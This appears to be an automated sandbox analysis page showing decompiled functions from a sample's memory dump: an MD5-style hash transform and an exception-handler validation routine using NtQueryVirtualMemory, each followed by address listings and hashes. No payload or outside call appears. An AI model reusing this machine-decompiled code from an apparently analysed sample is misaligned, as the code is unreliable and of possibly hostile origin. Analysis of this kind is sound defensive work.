                            Download Yara Rule
                            C-Code - Quality: 50%
                            			E00F13373(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}



































































































                            0x00f13376
                            0x00f13381
                            0x00f13384
                            0x00f13387
                            0x00f13388
                            0x00f13388
                            0x00f13393
                            0x00f133a4
                            0x00f133a6
                            0x00f133a9
                            0x00f133a9
                            0x00f133ac
                            0x00f133ac
                            0x00f133af
                            0x00f133af
                            0x00f133b2
                            0x00f133b2
                            0x00f133cf
                            0x00f133d2
                            0x00f133e8
                            0x00f133eb
                            0x00f13405
                            0x00f13408
                            0x00f1341e
                            0x00f13421
                            0x00f13423
                            0x00f1343b
                            0x00f1343e
                            0x00f13441
                            0x00f13459
                            0x00f1345c
                            0x00f13476
                            0x00f13479
                            0x00f1348f
                            0x00f13492
                            0x00f13494
                            0x00f134ac
                            0x00f134b1
                            0x00f134b4
                            0x00f134ca
                            0x00f134cd
                            0x00f134e7
                            0x00f134ea
                            0x00f13500
                            0x00f13503
                            0x00f13505
                            0x00f13520
                            0x00f13523
                            0x00f1353a
                            0x00f1353d
                            0x00f13541
                            0x00f1355a
                            0x00f1355d
                            0x00f1355f
                            0x00f13562
                            0x00f1357d
                            0x00f13580
                            0x00f13599
                            0x00f1359c
                            0x00f135ac
                            0x00f135af
                            0x00f135c7
                            0x00f135ca
                            0x00f135e4
                            0x00f135e7
                            0x00f135ff
                            0x00f13602
                            0x00f13618
                            0x00f1361b
                            0x00f13633
                            0x00f13636
                            0x00f1364e
                            0x00f13651
                            0x00f1366b
                            0x00f1366e
                            0x00f13684
                            0x00f13687
                            0x00f1369f
                            0x00f136a2
                            0x00f136bc
                            0x00f136bf
                            0x00f136d7
                            0x00f136da
                            0x00f136f0
                            0x00f136f3
                            0x00f1370b
                            0x00f1370e
                            0x00f13726
                            0x00f13729
                            0x00f1373b
                            0x00f1373e
                            0x00f13750
                            0x00f13753
                            0x00f13765
                            0x00f13768
                            0x00f1376c
                            0x00f1377c
                            0x00f1377f
                            0x00f1378d
                            0x00f13790
                            0x00f137a2
                            0x00f137a5
                            0x00f137b9
                            0x00f137bc
                            0x00f137be
                            0x00f137ce
                            0x00f137d1
                            0x00f137e3
                            0x00f137e6
                            0x00f137f4
                            0x00f137f7
                            0x00f13809
                            0x00f1380c
                            0x00f13810
                            0x00f13820
                            0x00f13823
                            0x00f13835
                            0x00f13838
                            0x00f13846
                            0x00f13849
                            0x00f1385b
                            0x00f1385e
                            0x00f13870
                            0x00f13873
                            0x00f13887
                            0x00f1388a
                            0x00f1389e
                            0x00f138a1
                            0x00f138b5
                            0x00f138b8
                            0x00f138cc
                            0x00f138cf
                            0x00f138e3
                            0x00f138e6
                            0x00f138fa
                            0x00f138ff
                            0x00f13911
                            0x00f13914
                            0x00f13928
                            0x00f1392b
                            0x00f1393f
                            0x00f13942
                            0x00f13958
                            0x00f1395b
                            0x00f1396f
                            0x00f13972
                            0x00f13984
                            0x00f13987
                            0x00f1399b
                            0x00f1399e
                            0x00f139b2
                            0x00f139b5
                            0x00f139c9
                            0x00f139d2
                            0x00f139d5
                            0x00f139de
                            0x00f139e7
                            0x00f139ef
                            0x00f139f7
                            0x00f13a01
                            0x00f13a16

                            APIs
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: da50312a0738fb8208467b0dc573d7b64c48983018d811ed3d5c943799986d32
                            • Instruction ID: c3ad9726d24f60518b4868bad7ba5b001e3f5ac6d322e7d405a630434d7b6e91
                            • Opcode Fuzzy Hash: da50312a0738fb8208467b0dc573d7b64c48983018d811ed3d5c943799986d32
                            • Instruction Fuzzy Hash: B122837BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F1B2A9, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F1B2A9(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xf1d310; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xf1d358 = 1;
										__eflags =  *0xf1d358;
										if( *0xf1d358 != 0) {
											goto L60;
										}
										_t84 =  *0xf1d310; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xf1d358 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xf1d310 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xf1d318 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xf1d314 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xf1d318 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xf1d318 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xf1d358 = 1;
							__eflags =  *0xf1d358;
							if( *0xf1d358 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xf1d318 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xf1d318 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xf1d358 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xf1d318 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xf1d310 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xf1d318 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xf1d318 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                            0x00f1b2b3
                            0x00f1b2b6
                            0x00f1b2bc
                            0x00f1b2da
                            0x00000000
                            0x00f1b2da
                            0x00f1b2c4
                            0x00f1b2cd
                            0x00f1b2d3
                            0x00f1b2e2
                            0x00f1b2e5
                            0x00f1b2e8
                            0x00f1b2f2
                            0x00f1b2f2
                            0x00f1b2f4
                            0x00f1b2f7
                            0x00f1b2f9
                            0x00f1b2f9
                            0x00f1b2fb
                            0x00f1b2fe
                            0x00000000
                            0x00000000
                            0x00f1b300
                            0x00f1b302
                            0x00f1b368
                            0x00f1b368
                            0x00f1b4c6
                            0x00000000
                            0x00f1b4c6
                            0x00f1b304
                            0x00f1b304
                            0x00f1b308
                            0x00f1b30a
                            0x00f1b30a
                            0x00f1b30a
                            0x00f1b30a
                            0x00f1b30d
                            0x00f1b30e
                            0x00f1b311
                            0x00f1b311
                            0x00f1b315
                            0x00f1b319
                            0x00f1b327
                            0x00f1b327
                            0x00f1b32f
                            0x00f1b335
                            0x00f1b337
                            0x00f1b339
                            0x00f1b349
                            0x00f1b356
                            0x00f1b35a
                            0x00f1b35f
                            0x00f1b361
                            0x00f1b3df
                            0x00f1b3df
                            0x00f1b363
                            0x00f1b363
                            0x00f1b363
                            0x00f1b3e1
                            0x00f1b3e3
                            0x00f1b4c4
                            0x00f1b4c4
                            0x00000000
                            0x00f1b3e9
                            0x00f1b3e9
                            0x00f1b3f0
                            0x00000000
                            0x00000000
                            0x00f1b3f6
                            0x00f1b3fa
                            0x00f1b456
                            0x00f1b458
                            0x00f1b460
                            0x00f1b462
                            0x00f1b464
                            0x00000000
                            0x00000000
                            0x00f1b466
                            0x00f1b46c
                            0x00f1b46e
                            0x00f1b470
                            0x00f1b485
                            0x00f1b485
                            0x00f1b487
                            0x00f1b4b6
                            0x00f1b4bd
                            0x00000000
                            0x00f1b4bd
                            0x00f1b48b
                            0x00f1b48c
                            0x00f1b48e
                            0x00f1b490
                            0x00f1b490
                            0x00f1b492
                            0x00f1b494
                            0x00f1b496
                            0x00f1b4aa
                            0x00f1b4aa
                            0x00f1b4ad
                            0x00f1b4af
                            0x00f1b4af
                            0x00f1b4b0
                            0x00f1b4b0
                            0x00000000
                            0x00f1b498
                            0x00f1b498
                            0x00f1b498
                            0x00f1b4a1
                            0x00f1b4a2
                            0x00f1b4a4
                            0x00f1b4a6
                            0x00f1b4a6
                            0x00000000
                            0x00f1b498
                            0x00f1b496
                            0x00f1b472
                            0x00f1b479
                            0x00f1b479
                            0x00f1b47b
                            0x00000000
                            0x00000000
                            0x00f1b47d
                            0x00f1b47e
                            0x00f1b481
                            0x00f1b483
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b483
                            0x00000000
                            0x00f1b479
                            0x00f1b3fc
                            0x00f1b3ff
                            0x00f1b404
                            0x00000000
                            0x00000000
                            0x00f1b40d
                            0x00f1b40f
                            0x00f1b415
                            0x00000000
                            0x00000000
                            0x00f1b41b
                            0x00f1b421
                            0x00000000
                            0x00000000
                            0x00f1b427
                            0x00f1b429
                            0x00f1b432
                            0x00f1b436
                            0x00000000
                            0x00000000
                            0x00f1b43c
                            0x00f1b43f
                            0x00f1b441
                            0x00000000
                            0x00000000
                            0x00f1b448
                            0x00f1b44a
                            0x00000000
                            0x00000000
                            0x00f1b44c
                            0x00f1b450
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b450
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b33b
                            0x00f1b33b
                            0x00f1b33b
                            0x00f1b342
                            0x00000000
                            0x00000000
                            0x00f1b344
                            0x00f1b345
                            0x00f1b347
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b347
                            0x00f1b36f
                            0x00f1b371
                            0x00000000
                            0x00000000
                            0x00f1b381
                            0x00f1b383
                            0x00f1b385
                            0x00000000
                            0x00000000
                            0x00f1b38b
                            0x00f1b392
                            0x00f1b3be
                            0x00f1b3be
                            0x00f1b3c0
                            0x00f1b3c2
                            0x00f1b3d6
                            0x00f1b3d8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b3c4
                            0x00f1b3c4
                            0x00f1b3c4
                            0x00f1b3cd
                            0x00f1b3ce
                            0x00f1b3d0
                            0x00f1b3d2
                            0x00f1b3d2
                            0x00000000
                            0x00f1b3c4
                            0x00f1b394
                            0x00f1b394
                            0x00f1b397
                            0x00f1b399
                            0x00f1b3ab
                            0x00f1b3ab
                            0x00f1b3ae
                            0x00f1b3b0
                            0x00f1b3b0
                            0x00f1b3b1
                            0x00f1b3b1
                            0x00f1b3b7
                            0x00f1b3b7
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b39b
                            0x00f1b39b
                            0x00f1b39b
                            0x00f1b3a2
                            0x00000000
                            0x00000000
                            0x00f1b3a4
                            0x00f1b3a4
                            0x00f1b3a5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b3a5
                            0x00f1b3a7
                            0x00f1b3a9
                            0x00f1b3bc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b3bc
                            0x00000000
                            0x00f1b3a9
                            0x00f1b31b
                            0x00f1b31e
                            0x00f1b321
                            0x00000000
                            0x00000000
                            0x00f1b323
                            0x00f1b325
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1b325
                            0x00f1b2ea
                            0x00f1b2ec
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00F1B35A
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: MemoryQueryVirtual
                            • String ID:
                            • API String ID: 2850889275-0
                            • Opcode ID: e7f0a49e83ca54f277062a8727afcfa37858e672e3a333cd45a55463d0a93427
                            • Instruction ID: 3cc49c4673f95b1103627a28f0cb1742743b54cd93c1579c5d0f0a545696421c
                            • Opcode Fuzzy Hash: e7f0a49e83ca54f277062a8727afcfa37858e672e3a333cd45a55463d0a93427
                            • Instruction Fuzzy Hash: 3A61E130A00646DFDB29CF29C8906E973A5EF85724F24C529E866C7296E735DCC1F740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F1B084, Relevance: .1, Instructions: 77COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 71%
